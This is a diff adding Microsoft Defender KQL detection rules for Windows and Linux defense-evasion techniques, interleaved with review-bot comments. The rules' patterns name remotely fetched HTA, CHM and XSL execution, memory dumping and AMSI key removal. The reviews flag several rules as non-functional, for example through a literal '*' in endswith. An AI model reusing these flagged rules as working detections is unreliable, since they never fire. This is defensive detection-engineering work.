@@ -0,0 +1,10 @@
+// Title: Registry Entries For Azorult Malware
+// Author: Trent Liffick
+// Date: 2020-05-08
+// Level: critical
+// Description: Detects the presence of a registry key created during Azorult execution
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.execution, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryKey endswith "SYSTEM*" and RegistryKey endswith "\\services\\localNETService"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/registry_persistence_via_service_in_safe_mode.kql b/KQL/rules/Defense Evasion/registry_persistence_via_service_in_safe_mode.kql
new file mode 100644
index 00000000..01f3e1d6
--- /dev/null
+++ b/KQL/rules/Defense Evasion/registry_persistence_via_service_in_safe_mode.kql
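Review bot: In the Azorult rule, `RegistryKey endswith "SYSTEM*" and RegistryKey endswith "\\services\\localNETService"` is an impossible conjunction — `*` is a literal in KQL `endswith` — so a rule rated `critical` can never fire. The Sigma `SYSTEM*` was a path prefix, so the line should be `| where RegistryKey contains "\\SYSTEM\\" and RegistryKey endswith "\\services\\localNETService"` (or `startswith "HKEY_LOCAL_MACHINE\\SYSTEM"` if your tenant renders hives that way). Since the description says the key is *created*, `ActionType == "RegistryKeyCreated"` would also match the stated scope and cut noise from later value writes under the same key.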
@@ -0,0 +1,10 @@
+// Title: Registry Persistence via Service in Safe Mode
+// Author: frack113
+// Date: 2022-04-04
+// Level: high
+// Description: Detects the modification of the registry to allow a driver or service to persist in Safe Mode.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.001
+
+DeviceRegistryEvents
+| where (RegistryValueData =~ "Service" and (RegistryKey endswith "\\Control\\SafeBoot\\Minimal*" or RegistryKey endswith "\\Control\\SafeBoot\\Network*") and RegistryKey endswith "\\(Default)") and (not(((RegistryValueData =~ "Service" and InitiatingProcessFolderPath =~ "C:\\Hexnode\\Hexnode Agent\\Current\\HexnodeAgent.exe" and (RegistryKey endswith "\\Control\\SafeBoot\\Minimal\\Hexnode Updater\\(Default)" or RegistryKey endswith "\\Control\\SafeBoot\\Network\\Hexnode Updater\\(Default)" or RegistryKey endswith "\\Control\\SafeBoot\\Minimal\\Hexnode Agent\\(Default)" or RegistryKey endswith "\\Control\\SafeBoot\\Network\\Hexnode Agent\\(Default)")) or (RegistryValueData =~ "Service" and InitiatingProcessFolderPath endswith "\\MBAMInstallerService.exe" and RegistryKey endswith "\\MBAMService\\(Default)") or (InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\msiexec.exe" and (RegistryKey endswith "\\Control\\SafeBoot\\Minimal\\SAVService\\(Default)" or RegistryKey endswith "\\Control\\SafeBoot\\Network\\SAVService\\(Default)")))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/regsvr32_dll_execution_with_suspicious_file_extension.kql b/KQL/rules/Defense Evasion/regsvr32_dll_execution_with_suspicious_file_extension.kql
new file mode 100644
index 00000000..322e2104
--- /dev/null
+++ b/KQL/rules/Defense Evasion/regsvr32_dll_execution_with_suspicious_file_extension.kql
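Review bot: The selection half of the `| where` is unsatisfiable: `RegistryKey endswith "\\Control\\SafeBoot\\Minimal*"` keeps the Sigma `*` as a literal and can never hold together with `RegistryKey endswith "\\(Default)"`, so the rule never fires and the three exclusion branches are moot. The intent is `(RegistryKey contains "\\Control\\SafeBoot\\Minimal\\" or RegistryKey contains "\\Control\\SafeBoot\\Network\\")`, with the default-value check moved to `RegistryValueName` — how Defender names the default value (empty string vs `(Default)`) should be confirmed against telemetry before choosing that literal. The same `\\(Default)` suffix appears in every exclusion branch and needs the same treatment, otherwise the Hexnode/MBAM/Sophos allow-lists stop working once the selection is fixed.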
@@ -0,0 +1,12 @@
+// Title: Regsvr32 DLL Execution With Suspicious File Extension
+// Author: Florian Roth (Nextron Systems), frack113
+// Date: 2021-11-29
+// Level: high
+// Description: Detects the execution of REGSVR32.exe with DLL files masquerading as other files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith ".bin" or ProcessCommandLine endswith ".bmp" or ProcessCommandLine endswith ".cr2" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".eps" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".ico" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpg" or ProcessCommandLine endswith ".log" or ProcessCommandLine endswith ".nef" or ProcessCommandLine endswith ".orf" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".raw" or ProcessCommandLine endswith ".rtf" or ProcessCommandLine endswith ".sr2" or ProcessCommandLine endswith ".temp" or ProcessCommandLine endswith ".tif" or ProcessCommandLine endswith ".tiff" or ProcessCommandLine endswith ".tmp" or ProcessCommandLine endswith ".txt") and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/regsvr32_execution_from_highly_suspicious_location.kql b/KQL/rules/Defense Evasion/regsvr32_execution_from_highly_suspicious_location.kql
new file mode 100644
index 00000000..f2e6928a
--- /dev/null
+++ b/KQL/rules/Defense Evasion/regsvr32_execution_from_highly_suspicious_location.kql
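Review bot: Every extension check here is a bare `ProcessCommandLine endswith ".ext"`, so the very common quoted form (`regsvr32 /s "C:\Users\...\payload.txt"`) — whose command line ends in `"` — is missed, as is a trailing space. A single regex is both shorter and closes that gap: `| where ProcessCommandLine matches regex @'(?i)\.(bin|bmp|cr2|dat|eps|gif|ico|jpe?g|log|nef|orf|png|raw|rtf|sr2|temp|tiff?|tmp|txt)["'']?\s*$'`. If the list is kept as-is, a comment noting that quoted paths are intentionally out of scope would at least make the limitation visible.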
@@ -0,0 +1,12 @@
+// Title: Regsvr32 Execution From Highly Suspicious Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-26
+// Level: high
+// Description: Detects execution of regsvr32 where the DLL is located in a highly suspicious locations
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and ((ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains "\\Windows\\Registration\\CRMLog" or ProcessCommandLine contains "\\Windows\\System32\\com\\dmp\\" or ProcessCommandLine contains "\\Windows\\System32\\FxsTmp\\" or ProcessCommandLine contains "\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" or ProcessCommandLine contains "\\Windows\\System32\\spool\\drivers\\color\\" or ProcessCommandLine contains "\\Windows\\System32\\spool\\PRINTERS\\" or ProcessCommandLine contains "\\Windows\\System32\\spool\\SERVERS\\" or ProcessCommandLine contains "\\Windows\\System32\\Tasks_Migrated\\" or ProcessCommandLine contains "\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\com\\dmp\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\FxsTmp\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains "\\Windows\\Tasks\\" or ProcessCommandLine contains "\\Windows\\Tracing\\") or ((ProcessCommandLine contains " \"C:\\" or ProcessCommandLine contains " C:\\" or ProcessCommandLine contains " 'C:\\" or ProcessCommandLine contains "D:\\") and (not((ProcessCommandLine contains "C:\\Program Files (x86)\\" or ProcessCommandLine contains "C:\\Program Files\\" or 
ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Users\\" or ProcessCommandLine contains " C:\\Windows\\" or ProcessCommandLine contains " \"C:\\Windows\\" or ProcessCommandLine contains " 'C:\\Windows\\"))))) and (not((ProcessCommandLine =~ "" or isnull(ProcessCommandLine))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/regsvr32_execution_from_potential_suspicious_location.kql b/KQL/rules/Defense Evasion/regsvr32_execution_from_potential_suspicious_location.kql
new file mode 100644
index 00000000..c0686fd3
--- /dev/null
+++ b/KQL/rules/Defense Evasion/regsvr32_execution_from_potential_suspicious_location.kql
@@ -0,0 +1,12 @@
+// Title: Regsvr32 Execution From Potential Suspicious Location
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-26
+// Level: medium
+// Description: Detects execution of regsvr32 where the DLL is located in a potentially suspicious location.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+// False Positives:
+// - Some installers might execute "regsvr32" with DLLs located in %TEMP% or in %PROGRAMDATA%. Apply additional filters if necessary.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/remote_access_tool_rurat_execution_from_unusual_location.kql b/KQL/rules/Defense Evasion/remote_access_tool_rurat_execution_from_unusual_location.kql
new file mode 100644
index 00000000..1c403f04
--- /dev/null
+++ b/KQL/rules/Defense Evasion/remote_access_tool_rurat_execution_from_unusual_location.kql
@@ -0,0 +1,10 @@
+// Title: Remote Access Tool - RURAT Execution From Unusual Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-19
+// Level: medium
+// Description: Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\Program Files')
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\rutserv.exe" or FolderPath endswith "\\rfusclient.exe") or ProcessVersionInfoProductName =~ "Remote Utilities") and (not((FolderPath startswith "C:\\Program Files\\Remote Utilities" or FolderPath startswith "C:\\Program Files (x86)\\Remote Utilities")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/remote_chm_file_download_execution_via_hh_exe.kql b/KQL/rules/Defense Evasion/remote_chm_file_download_execution_via_hh_exe.kql
new file mode 100644
index 00000000..313674f4
--- /dev/null
+++ b/KQL/rules/Defense Evasion/remote_chm_file_download_execution_via_hh_exe.kql
@@ -0,0 +1,10 @@
+// Title: Remote CHM File Download/Execution Via HH.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-29
+// Level: high
+// Description: Detects the usage of "hh.exe" to execute/download remotely hosted ".chm" files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "\\\\") and (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/remote_code_execute_via_winrm_vbs.kql b/KQL/rules/Defense Evasion/remote_code_execute_via_winrm_vbs.kql
new file mode 100644
index 00000000..77b5df98
--- /dev/null
+++ b/KQL/rules/Defense Evasion/remote_code_execute_via_winrm_vbs.kql
@@ -0,0 +1,10 @@
+// Title: Remote Code Execute via Winrm.vbs
+// Author: Julia Fomina, oscd.community
+// Date: 2020-10-07
+// Level: medium
+// Description: Detects an attempt to execute code or create service on remote host via winrm.vbs.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "winrm" and ProcessCommandLine contains "invoke Create wmicimv2/Win32_" and ProcessCommandLine contains "-r:http") and (FolderPath endswith "\\cscript.exe" or ProcessVersionInfoOriginalFileName =~ "cscript.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/remote_file_download_via_findstr_exe.kql b/KQL/rules/Defense Evasion/remote_file_download_via_findstr_exe.kql
new file mode 100644
index 00000000..ec27779c
--- /dev/null
+++ b/KQL/rules/Defense Evasion/remote_file_download_via_findstr_exe.kql
@@ -0,0 +1,11 @@
+// Title: Remote File Download Via Findstr.EXE
+// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-10-05
+// Level: medium
+// Description: Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "findstr" or FolderPath endswith "findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE") and ((ProcessCommandLine contains " -v " or ProcessCommandLine contains " /v " or ProcessCommandLine contains " –v " or ProcessCommandLine contains " —v " or ProcessCommandLine contains " ―v ") and (ProcessCommandLine contains " -l " or ProcessCommandLine contains " /l " or ProcessCommandLine contains " –l " or ProcessCommandLine contains " —l " or ProcessCommandLine contains " ―l ") and ProcessCommandLine contains "\\\\")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/remote_xsl_execution_via_msxsl_exe.kql b/KQL/rules/Defense Evasion/remote_xsl_execution_via_msxsl_exe.kql
new file mode 100644
index 00000000..ddeb538c
--- /dev/null
+++ b/KQL/rules/Defense Evasion/remote_xsl_execution_via_msxsl_exe.kql
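Review bot: `FolderPath endswith "findstr.exe"` is the only image check in this file written without the leading path separator, so it also matches any binary whose name merely ends in that string (e.g. `myfindstr.exe`); every sibling rule uses the `"\\findstr.exe"` form and this one should too. Note also that the first group is an OR with `ProcessCommandLine contains "findstr"`, so the image checks are effectively redundant whenever the word appears anywhere in the command line — that is faithful to the Sigma source, but worth a one-line comment so nobody "tightens" it later without realising the command-line branch still fires.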
@@ -0,0 +1,12 @@
+// Title: Remote XSL Execution Via Msxsl.EXE
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2023-11-09
+// Level: high
+// Description: Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1220
+// False Positives:
+// - Msxsl is not installed by default and is deprecated, so unlikely on most systems.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "http" and FolderPath endswith "\\msxsl.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql b/KQL/rules/Defense Evasion/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql
new file mode 100644
index 00000000..dfee6a59
--- /dev/null
+++ b/KQL/rules/Defense Evasion/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql
@@ -0,0 +1,10 @@
+// Title: RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses
+// Author: frack113
+// Date: 2021-07-13
+// Level: high
+// Description: Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-order hijacking.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Invoke-ATHRemoteFXvGPUDisablementCommand" or ProcessCommandLine contains "Invoke-ATHRemoteFXvGPUDisableme"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/remotely_hosted_hta_file_executed_via_mshta_exe.kql b/KQL/rules/Defense Evasion/remotely_hosted_hta_file_executed_via_mshta_exe.kql
new file mode 100644
index 00000000..e0719599
--- /dev/null
+++ b/KQL/rules/Defense Evasion/remotely_hosted_hta_file_executed_via_mshta_exe.kql
@@ -0,0 +1,10 @@
+// Title: Remotely Hosted HTA File Executed Via Mshta.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-08
+// Level: high
+// Description: Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218.005
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "ftp://") and (FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/removal_of_amsi_provider_registry_keys.kql b/KQL/rules/Defense Evasion/removal_of_amsi_provider_registry_keys.kql
new file mode 100644
index 00000000..ee4a4e4b
--- /dev/null
+++ b/KQL/rules/Defense Evasion/removal_of_amsi_provider_registry_keys.kql
@@ -0,0 +1,12 @@
+// Title: Removal Of AMSI Provider Registry Keys
+// Author: frack113
+// Date: 2021-06-07
+// Level: high
+// Description: Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "{2781761E-28E0-4109-99FE-B9D127C57AFE}" or RegistryKey endswith "{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}") and (not((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\"))))
\ No newline at end of file
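Review bot: The AMSI rule's title and description are about *deletion*, but the `| where` has no `ActionType` predicate, so it fires on every creation or modification of those two provider keys as well — including routine re-registration by Defender platform updates that the MsMpEng exclusion only partly covers (other installers touch the same CLSIDs). Prepend `ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted") and` to the condition. The GUID suffix match is also unscoped; `RegistryKey contains "\\Microsoft\\AMSI\\Providers\\"` would tie it to the path the description names and keep unrelated COM registrations of the same CLSID out.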
diff --git a/KQL/rules/Defense Evasion/removal_of_index_value_to_hide_schedule_task_registry.kql b/KQL/rules/Defense Evasion/removal_of_index_value_to_hide_schedule_task_registry.kql
new file mode 100644
index 00000000..280e5b30
--- /dev/null
+++ b/KQL/rules/Defense Evasion/removal_of_index_value_to_hide_schedule_task_registry.kql
@@ -0,0 +1,10 @@
+// Title: Removal Of Index Value to Hide Schedule Task - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-26
+// Level: medium
+// Description: Detects when the "index" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as "schtasks /query"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562
+
+DeviceRegistryEvents
+| where (ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "Index")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/removal_of_sd_value_to_hide_schedule_task_registry.kql b/KQL/rules/Defense Evasion/removal_of_sd_value_to_hide_schedule_task_registry.kql
new file mode 100644
index 00000000..cdb6d9ad
--- /dev/null
+++ b/KQL/rules/Defense Evasion/removal_of_sd_value_to_hide_schedule_task_registry.kql
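Review bot: `RegistryKey endswith "...\\Schedule\\TaskCache\\Tree*"` keeps the Sigma `*` as a literal character, so no real key path satisfies it and the rule is dead. The prefix should be `RegistryKey contains "\\Schedule\\TaskCache\\Tree\\"`, and since `Index` is the name of the deleted value rather than part of the key path, `RegistryKey contains "Index"` should become `RegistryValueName =~ "Index"` — the `contains` form would otherwise also match any task folder or task name containing that substring. With those two changes the existing `ActionType` filter does exactly what the title promises.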
@@ -0,0 +1,10 @@
+// Title: Removal Of SD Value to Hide Schedule Task - Registry
+// Author: Sittikorn S
+// Date: 2022-04-15
+// Level: medium
+// Description: Remove SD (Security Descriptor) value in \Schedule\TaskCache\Tree registry hive to hide schedule task. This technique is used by Tarrask malware
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562
+
+DeviceRegistryEvents
+| where (ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "SD")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/remove_immutable_file_attribute.kql b/KQL/rules/Defense Evasion/remove_immutable_file_attribute.kql
new file mode 100644
index 00000000..491b558b
--- /dev/null
+++ b/KQL/rules/Defense Evasion/remove_immutable_file_attribute.kql
@@ -0,0 +1,12 @@
+// Title: Remove Immutable File Attribute
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-15
+// Level: medium
+// Description: Detects usage of the 'chattr' utility to remove immutable file attribute.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1222.002
+// False Positives:
+// - Administrator interacting with immutable files (e.g. for instance backups).
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -i " and FolderPath endswith "/chattr"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/remove_scheduled_cron_task_job.kql b/KQL/rules/Defense Evasion/remove_scheduled_cron_task_job.kql
new file mode 100644
index 00000000..ff46027a
--- /dev/null
+++ b/KQL/rules/Defense Evasion/remove_scheduled_cron_task_job.kql
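Review bot: Same two defects as the sibling Index rule: the literal `*` in `endswith "...\\TaskCache\\Tree*"` makes the key predicate unsatisfiable, and `RegistryKey contains "SD"` is a case-insensitive substring test on the key path, which — once the prefix is fixed — would match any task folder or task name containing "sd" rather than the security-descriptor value. The condition should be `RegistryKey contains "\\Schedule\\TaskCache\\Tree\\" and RegistryValueName =~ "SD"`, keeping the `ActionType` filter as is. For the chattr rule further down, `ProcessCommandLine contains " -i "` misses combined flags such as `-ia` or `-i` as the final token; `matches regex @"\s-[a-zA-Z]*i[a-zA-Z]*(\s|$)"` is a cheap way to cover those if that is wanted.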
@@ -0,0 +1,12 @@
+// Title: Remove Scheduled Cron Task/Job
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-15
+// Level: medium
+// Description: Detects usage of the 'crontab' utility to remove the current crontab.
+This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -r" and FolderPath endswith "crontab"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/renamed_autohotkey_exe_execution.kql b/KQL/rules/Defense Evasion/renamed_autohotkey_exe_execution.kql
new file mode 100644
index 00000000..31f52e5c
--- /dev/null
+++ b/KQL/rules/Defense Evasion/renamed_autohotkey_exe_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed AutoHotkey.EXE Execution
+// Author: Nasreddine Bencherchali
+// Date: 2023-02-07
+// Level: medium
+// Description: Detects execution of a renamed autohotkey.exe binary based on PE metadata fields
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where (ProcessVersionInfoProductName contains "AutoHotkey" or ProcessVersionInfoFileDescription contains "AutoHotkey" or (ProcessVersionInfoOriginalFileName in~ ("AutoHotkey.exe", "AutoHotkey.rc"))) and (not(((FolderPath endswith "\\AutoHotkey.exe" or FolderPath endswith "\\AutoHotkey32.exe" or FolderPath endswith "\\AutoHotkey32_UIA.exe" or FolderPath endswith "\\AutoHotkey64.exe" or FolderPath endswith "\\AutoHotkey64_UIA.exe" or FolderPath endswith "\\AutoHotkeyA32.exe" or FolderPath endswith "\\AutoHotkeyA32_UIA.exe" or FolderPath endswith "\\AutoHotkeyU32.exe" or FolderPath endswith "\\AutoHotkeyU32_UIA.exe" or FolderPath endswith "\\AutoHotkeyU64.exe" or FolderPath endswith "\\AutoHotkeyU64_UIA.exe") or FolderPath contains "\\AutoHotkey")))
\ No newline at end of file
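Review bot: The second line of the description, `+This is a common occurrence where cryptocurrency miners ...`, is emitted without the `//` comment prefix, so the generated .kql file is not a valid query as written — the bare line sits before `DeviceProcessEvents` and will be parsed as query text. The converter appears to split multi-line Sigma descriptions on newlines and only prefixes the first one; the same defect is in renamed_procdump_execution (`+This often done by attackers ...`), runmru_registry_key_deletion and runmru_registry_key_deletion_registry (`+In the clickfix techniques ...`, `+Adversaries may delete ...`). Each continuation line should be written as `// This is a common occurrence ...`, and the stray empty line the split leaves between the description and `// MITRE Tactic:` can be dropped at the same time.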
diff --git a/KQL/rules/Defense Evasion/renamed_boinc_client_execution.kql b/KQL/rules/Defense Evasion/renamed_boinc_client_execution.kql
new file mode 100644
index 00000000..912b2b4c
--- /dev/null
+++ b/KQL/rules/Defense Evasion/renamed_boinc_client_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed BOINC Client Execution
+// Author: Matt Anderson (Huntress)
+// Date: 2024-07-23
+// Level: medium
+// Description: Detects the execution of a renamed BOINC binary.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1553
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "BOINC.exe" and (not(FolderPath endswith "\\BOINC.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/renamed_createdump_utility_execution.kql b/KQL/rules/Defense Evasion/renamed_createdump_utility_execution.kql
new file mode 100644
index 00000000..60a038c9
--- /dev/null
+++ b/KQL/rules/Defense Evasion/renamed_createdump_utility_execution.kql
@@ -0,0 +1,12 @@
+// Title: Renamed CreateDump Utility Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-09-20
+// Level: high
+// Description: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access
+// False Positives:
+// - Command lines that use the same flags
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains " -u " and ProcessCommandLine contains " -f " and ProcessCommandLine contains ".dmp") or (ProcessCommandLine contains " --full " and ProcessCommandLine contains " --name " and ProcessCommandLine contains ".dmp")) or ProcessVersionInfoOriginalFileName =~ "FX_VER_INTERNALNAME_STR") and (not(FolderPath endswith "\\createdump.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/renamed_mavinject_exe_execution.kql b/KQL/rules/Defense Evasion/renamed_mavinject_exe_execution.kql
new file mode 100644
index 00000000..c53a40fd
--- /dev/null
+++ b/KQL/rules/Defense Evasion/renamed_mavinject_exe_execution.kql
@@ -0,0 +1,12 @@
+// Title: Renamed Mavinject.EXE Execution
+// Author: frack113, Florian Roth
+// Date: 2022-12-05
+// Level: high
+// Description: Detects the execution of a renamed version of the "Mavinject" process. Which can be abused to perform process injection using the "/INJECTRUNNING" flag
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055.001, attack.t1218.013
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessVersionInfoOriginalFileName in~ ("mavinject32.exe", "mavinject64.exe")) and (not((FolderPath endswith "\\mavinject32.exe" or FolderPath endswith "\\mavinject64.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/renamed_megasync_execution.kql b/KQL/rules/Defense Evasion/renamed_megasync_execution.kql
new file mode 100644
index 00000000..c9a77b0e
--- /dev/null
+++ b/KQL/rules/Defense Evasion/renamed_megasync_execution.kql
@@ -0,0 +1,13 @@
+// Title: Renamed MegaSync Execution
+// Author: Sittikorn S
+// Date: 2021-06-22
+// Level: high
+// Description: Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Software that illegally integrates MegaSync in a renamed form
+// - Administrators that have renamed MegaSync
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "megasync.exe" and (not(FolderPath endswith "\\megasync.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/renamed_microsoft_teams_execution.kql b/KQL/rules/Defense Evasion/renamed_microsoft_teams_execution.kql
new file mode 100644
index 00000000..9101be24
--- /dev/null
+++ b/KQL/rules/Defense Evasion/renamed_microsoft_teams_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed Microsoft Teams Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-07-12
+// Level: medium
+// Description: Detects the execution of a renamed Microsoft Teams binary.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where (ProcessVersionInfoOriginalFileName in~ ("msteams.exe", "teams.exe")) and (not((FolderPath endswith "\\msteams.exe" or FolderPath endswith "\\teams.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/renamed_msdt_exe_execution.kql b/KQL/rules/Defense Evasion/renamed_msdt_exe_execution.kql
new file mode 100644
index 00000000..70447fb1
--- /dev/null
+++ b/KQL/rules/Defense Evasion/renamed_msdt_exe_execution.kql
@@ -0,0 +1,12 @@
